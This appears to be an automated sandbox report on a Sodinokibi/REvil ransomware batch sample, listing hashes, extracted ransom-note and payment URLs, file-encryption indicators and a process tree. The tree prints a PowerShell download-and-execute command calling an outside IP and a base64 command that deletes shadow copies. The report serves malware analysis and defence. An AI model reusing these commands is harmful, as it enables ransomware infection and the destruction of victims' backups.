Analysis
-
max time kernel
53s -
max time network
58s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Resource
win7
Behavioral task
behavioral2
Sample
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Resource
win10
General
-
Target
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
-
Size
217B
-
MD5
ac5dca786af1760da0a1d3554009dc33
-
SHA1
983a1634a67dbebf5f835d167ba968f2daf3efb9
-
SHA256
fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189
-
SHA512
5eae6e71fa72edefd9a1373baa4add4e9dd9fc6ad2e7410f83fb56b1ec10633b5bf2d296016857c9667564ee1043a9207f7dc8ff0dab8b363598902eb1f8c611
Malware Config
Extracted
http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8
Extracted
C:\nhq84-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A69ACD13773F7655
http://decryptor.cc/A69ACD13773F7655
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1276 powershell.exe -
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\ShowCopy.png => \??\c:\users\admin\pictures\ShowCopy.png.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\SwitchResolve.png => \??\c:\users\admin\pictures\SwitchResolve.png.nhq84 powershell.exe File opened for modification \??\c:\users\admin\pictures\TraceCompare.tiff powershell.exe File renamed C:\Users\Admin\Pictures\MoveUnprotect.raw => \??\c:\users\admin\pictures\MoveUnprotect.raw.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\ReadFind.raw => \??\c:\users\admin\pictures\ReadFind.raw.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\SetAdd.tif => \??\c:\users\admin\pictures\SetAdd.tif.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\TraceSkip.tif => \??\c:\users\admin\pictures\TraceSkip.tif.nhq84 powershell.exe File opened for modification \??\c:\users\admin\pictures\DenyExport.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DenyExport.tiff => \??\c:\users\admin\pictures\DenyExport.tiff.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\RegisterClear.raw => \??\c:\users\admin\pictures\RegisterClear.raw.nhq84 powershell.exe File renamed C:\Users\Admin\Pictures\TraceCompare.tiff => \??\c:\users\admin\pictures\TraceCompare.tiff.nhq84 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ctv74y.bmp" powershell.exe -
Drops file in Program Files directory 43 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\UnpublishInitialize.jtx powershell.exe File opened for modification \??\c:\program files\UnregisterUpdate.vdw powershell.exe File opened for modification \??\c:\program files\ConfirmWait.wmf powershell.exe File opened for modification \??\c:\program files\PopRestore.txt powershell.exe File opened for modification \??\c:\program files\RepairDeny.wps powershell.exe File opened for modification \??\c:\program files\SkipEnter.jtx powershell.exe File opened for modification \??\c:\program files\SyncConnect.mhtml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\nhq84-readme.txt powershell.exe File opened for modification \??\c:\program files\RevokeUnblock.ppt powershell.exe File opened for modification \??\c:\program files\SearchRegister.doc powershell.exe File opened for modification \??\c:\program files\SwitchUnlock.ttc powershell.exe File opened for modification \??\c:\program files\TestAdd.M2T powershell.exe File opened for modification \??\c:\program files\InstallWatch.asf powershell.exe File opened for modification \??\c:\program files\LockGrant.M2T powershell.exe File opened for modification \??\c:\program files\ProtectFind.mid powershell.exe File opened for modification \??\c:\program files\PublishExport.mpe powershell.exe File opened for modification \??\c:\program files\SplitEnable.tmp powershell.exe File created \??\c:\program files\nhq84-readme.txt powershell.exe File opened for modification \??\c:\program files\LimitUnblock.dwfx powershell.exe File opened for modification \??\c:\program files\SplitResume.wpl powershell.exe File opened for modification \??\c:\program files\SuspendEnter.mpv2 powershell.exe File opened for modification \??\c:\program files\UnregisterMerge.emf powershell.exe File opened for modification \??\c:\program files\CloseGrant.vbs powershell.exe File opened for modification \??\c:\program files\CompleteLock.css powershell.exe File opened for modification \??\c:\program files\ExitOpen.tif powershell.exe File opened for modification \??\c:\program files\ExportSuspend.tmp powershell.exe File opened for modification \??\c:\program files\LimitSkip.vssm powershell.exe File opened for modification \??\c:\program files\ApprovePop.rtf powershell.exe File opened for modification \??\c:\program files\ApprovePop.vbs powershell.exe File opened for modification \??\c:\program files\ExitProtect.pub powershell.exe File opened for modification \??\c:\program files\InstallTrace.cr2 powershell.exe File opened for modification \??\c:\program files\ResumeConvertTo.mp3 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\nhq84-readme.txt powershell.exe File created \??\c:\program files (x86)\nhq84-readme.txt powershell.exe File opened for modification \??\c:\program files\AddSuspend.xlt powershell.exe File opened for modification \??\c:\program files\CompleteTrace.mid powershell.exe File opened for modification \??\c:\program files\UnregisterInstall.vstx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\nhq84-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromSuspend.TS powershell.exe File opened for modification \??\c:\program files\GrantMove.clr powershell.exe File opened for modification \??\c:\program files\InstallSuspend.iso powershell.exe File opened for modification \??\c:\program files\OptimizeInvoke.rar powershell.exe File opened for modification \??\c:\program files\SubmitJoin.mht powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1276 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1276 powershell.exe 1276 powershell.exe 1276 powershell.exe 1548 powershell.exe 1548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeBackupPrivilege 1856 vssvc.exe Token: SeRestorePrivilege 1856 vssvc.exe Token: SeAuditPrivilege 1856 vssvc.exe Token: SeTakeOwnershipPrivilege 1276 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1156 wrote to memory of 1276 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1276 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1276 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1276 1156 cmd.exe powershell.exe PID 1276 wrote to memory of 1548 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 1548 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 1548 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 1548 1276 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\058f5b8d291ac79c2bb7a3f231e3b5d8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8');Invoke-SFWJRWOSAI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1856